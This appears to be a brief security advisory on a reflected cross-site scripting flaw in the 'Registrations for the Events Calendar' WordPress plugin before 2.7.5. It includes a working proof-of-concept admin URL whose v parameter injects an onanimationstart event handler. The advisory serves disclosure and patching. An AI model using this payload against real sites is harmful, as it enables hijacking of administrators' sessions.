The plugin does not escape the v parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting
https://example.com/wp-admin/admin.php?page=registrations-for-the-events-calendar&tab;=registrations&v;="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//
CPE | Name | Operator | Version |
---|---|---|---|
registrations-for-the-events-calendar | lt | 2.7.5 |